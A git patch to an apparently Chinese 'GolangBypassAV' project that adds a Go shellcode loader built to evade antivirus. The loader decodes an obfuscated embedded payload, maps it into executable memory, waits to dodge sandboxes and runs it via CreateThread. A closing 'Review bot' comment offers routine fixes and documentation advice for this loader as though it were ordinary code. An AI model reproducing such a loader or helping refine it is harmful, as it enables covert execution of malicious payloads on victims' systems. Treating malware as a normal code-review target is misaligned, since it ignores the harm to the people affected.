From 0a6ef26000db1c6791e700ffd748681f746c435a Mon Sep 17 00:00:00 2001
From: Administrator <1850597152@qq.com>
Date: Sun, 15 Aug 2021 19:25:41 +0800
Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=8A=A0CreateThread?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 README.md | 12 ++---
 test3/main.go | 3 +-
 test4/main.go | 123 ++++++++++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 130 insertions(+), 8 deletions(-)
 create mode 100644 test4/main.go

diff --git a/README.md b/README.md
index de36687..cb0e3da 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,7 @@
 # GolangBypassAV
 研究利用golang来bypassAV
-## 说明
+## 前言
 免杀这块本来就不是web狗擅长的,而且作为一个web狗也没必要花太多时间来折腾这个,达到能用就行,不要追求全部免杀,能免杀目标就行。
@@ -9,12 +9,10 @@
 静态免杀比较简单,可选加密payload或者分离payload。
 分离免杀效果比加密payload的效果要好。
-## 目录介绍
-- hello
-golang的demo。hello world 也有5个报毒。
-
-- test1
-随手抄了一个加密payload出来。效果一般。
+## 说明
+test1、test2效果还可以。
+
+
diff --git a/test3/main.go b/test3/main.go
index b6e2c9d..f4e2f5a 100644
--- a/test3/main.go
+++ b/test3/main.go
@@ -128,7 +128,8 @@ func getFileShellCode1(file string) string {
 }
 func main() {
-	//用了virtualProtect没什么明显提升,还是7个
+	//用了virtualProtect没什么明显提升,还是7个。
+	//virtualProtect传参还有点问题,待修复。
 	//fmt.Println(1)
diff --git a/test4/main.go b/test4/main.go
new file mode 100644
index 0000000..999fc53
--- /dev/null
+++ b/test4/main.go
@@ -0,0 +1,123 @@ +package main + +import ( + "GolangBypassAV/encry" + "encoding/base64" + "fmt" + "os" + "syscall" + "time" + "unsafe" +) + +const ( + MEM_COMMIT = 0x1000 + MEM_RESERVE = 0x2000 + PAGE_EXECUTE_READWRITE = 0x40 +) + +var kk = []byte{0x11} + +var ( + kernel32 = syscall.MustLoadDLL("kernel32.dll") + ntdll = syscall.MustLoadDLL("ntdll.dll") + VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") + CreateThread = kernel32.MustFindProc("CreateThread") + + RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") +) + +func base64Decode(data string) []byte { + data1, _ := base64.StdEncoding.DecodeString(data) + return data1 +} + +func base64Encode(data []byte) string { + bdata := base64.StdEncoding.EncodeToString(data) + return bdata +} + +func getEnCode(data []byte) string { + bdata := base64.StdEncoding.EncodeToString(data) + + bydata := []byte(bdata) + var shellcode []byte + + for i := 0; i < len(bydata); i++ { + shellcode = append(shellcode, bydata[i]+kk[0]) + } + return base64.StdEncoding.EncodeToString(shellcode) +} + +func getDeCode(string2 string) []byte { + + ss, _ := base64.StdEncoding.DecodeString(string2) + string2 = string(ss) + var shellcode []byte + + bydata := []byte(string2) + + for i := 0; i < len(bydata); i++ { + shellcode = append(shellcode, bydata[i]-kk[0]) + } + ssb, _ := base64.StdEncoding.DecodeString(string(shellcode)) + return ssb + +} + +func checkError(err error) { + if err != nil { + if err.Error() != "The operation completed successfully." { + println(err.Error()) + os.Exit(1) + } + } +} + +func genEXE(charcode []byte) { + + addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) + if err != nil && err.Error() != "The operation completed successfully." { + syscall.Exit(0) + } + _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode))) + if err != nil && err.Error() != "The operation completed successfully." 
{ + syscall.Exit(0) + } + time.Sleep(5 * time.Second) + //syscall.Syscall(addr, 0, 0, 0, 0) + CreateThread.Call(0, 0, addr, 0, 0, 0) +} + +func gd() int64 { + time.Sleep(time.Duration(2) * time.Second) + + dd := time.Now().UTC().UnixNano() + return dd + 123456 + +} + +func getFileShellCode(file string) []byte { + data := encry.ReadFile(file) + //shellCodeHex := encry.GetBase64Data(data) + //fmt.Print(shellCodeHex) + return data +} + +func getFileShellCode1(file string) string { + data := encry.ReadFile(file) + shellCodeHex := base64Encode(data) + fmt.Print(shellCodeHex) + return shellCodeHex +} + +func main() { + //fmt.Println(1) + + //fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin"))) + + bbdata := "QFZ6VUZhVYCKUlJSUlZXY2JnU2RmZ2taXnVbfWRahWRqVnpdZnl5WnpCWnhkWoWKZlZ4YYVBgVxlZVlbZFVZUoNViXl3UlqEWlZZU4piQlNSdFl6SGdbU2Zmel1melRdYnuJWlJ1U354aXhqVIhbQnSAhlJ6UlJSUlZ6V4hZY39kUlliZlqFWlhWZF1iVFNbUnVVe2d8e0CKZlhdX1p5WlJ1a19edH1aXnRUhGJ0WVtVZlZTiGV7eHV3V15SQYh8VFZmRkFpaWpoVmRdYlRjW1J1U35iaoReZFZkXWJTiVtSdVNTeohkWmRSWWJiZ3lTaFdGa2h8V2piZ31TaHx6VUhUU1Nmh0B4aFZXa2h8el1Whn1hQEBAQGlogFJkc0ZEcmhGgXN+Z0FSVldoZGp/fmVaf4lic4FedYpqWUBKZ1pedH1aXnVbX150U19edH1TZlZXYmJzgEdnf35/QEppg3RCgVp6dFdThlRSVVJSU19edH1TZmZXY3J4X1NmZlhHZ0V+d4mHQGdHQn1zZFp/U2RVWWRkan9qZWVZW2Z+eFJSfFRWZn1bU4aGhWdde4dAQmZ6W4l8elWIQlOCVH1KWnp3V1p6dYFbiUlVQEBAQEBlZVlbZn1bU4Z6QVhYWYdAQmppUlVFaHVSYlJSZGFAYVVFZF5SYlJSR0phgUZSVlJSYHp6QEBAQF1EfUdfi15SfGtoZ3VVdWZScnpKgHJlW1eBRlOFhkaAalZfhmJzc0J5gF14a4p+QHmDemZFd0d8X0mFfWmIi31HcoJYf3mIamSIYIODX15GQGKGYXN4Z1dkf4tHSIZiRIl6ZWpJhINbdlJTZ3RDZ4pdZld/a2hGQWB6U19zRIGBc1iJeV2LZoZeVFKAakNKhXRYV0FyaFuEa2WEeGVnX1tjZFJGXXtSSFpZV3xraV+DWlVahl9URYlee2qLXXtaiF6LhHhnQ32Ga1hKRHSKU2BnVFJDXXtWSFpXdWFni2pBYIpTZnR+fXxraEZBXYtmhl5UfF9UeFJpaX9Dh0JIc2dUSF92il9ci19nQ4lFa0p+g3t6f0iKiWRkfmlnQ35ad3J6UouFglNog3VaXHRagEpaYEpBf4hpfXuLYXR7RXpKZlVqZmJTa2JKSEBZaEB+WXuJholGaEZkRohUZIFCRFViSGWIY354c1aIRVNSiFlIRWN5YXiHfHJDRYE8doRgflxXRX5KSnVnSUqFW3pZeHqEVmlaWkNBRH6Gi4ZeY4hWaH2E
e1hdYWB6X0VBfmBbd1l7Q3xkh1pHWkFKaIBHYmZ3RFV2dEZnWGGJe1lIfkOHc1Z0Z0dzQXeAg4BJVFyKdWSJWkhocoVIWn1lWGeJgXp2gUaDW35nX1mDRXVFi1pSYnNIiIVyW2hASmdaXnR+R1JSU1JSVlhFUlNSUlJWWEZiUlJSUlZYR2hcY2VGd0BnZFtfZWZBeltGQXpbSWZ6W0N8WEVSVFJSUlZ+WzxmWEdWgXJbRYdAZ2RaYVZaWmlSdV1rfnqIdVpSdGBXiFlpaWhXeWpkUmZSUlJSUmZeYYB/QERAQItWil56RUZde1ZCX4pFiV57WlJWe2NodlJOTg==" + shellCodeHex := getDeCode(bbdata) + gd() + genEXE(shellCodeHex) +}
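Review bot: `getDeCode` discards both `DecodeString` errors (`ss, _ :=` and `ssb, _ :=`), so a corrupt or truncated `bbdata` silently yields an empty slice and `genEXE` then panics at `&charcode[0]`; guard it with `if len(charcode) == 0 { return }` before the `VirtualAlloc.Call`. `checkError` implements the same `"The operation completed successfully."` comparison that `genEXE` repeats inline twice, yet nothing in this file calls it, and `base64Decode`, `getEnCode` and `getFileShellCode` likewise appear unreferenced outside commented-out lines, so either route `genEXE` through the helper or drop the dead definitions. The new file carries no doc comments at all; `kk`, `getEnCode` and `getDeCode` in particular should state the scheme plainly, e.g. `// getEnCode base64-encodes data and then adds kk[0] to every byte of that text; this is a fixed single-byte obfuscation, not encryption, and getDeCode is its exact inverse.` so a later reader does not mistake it for a keyed cipher. The package-level `VirtualAlloc`, `CreateThread` and `RtlCopyMemory` are exported names and by Go convention also need a leading comment each.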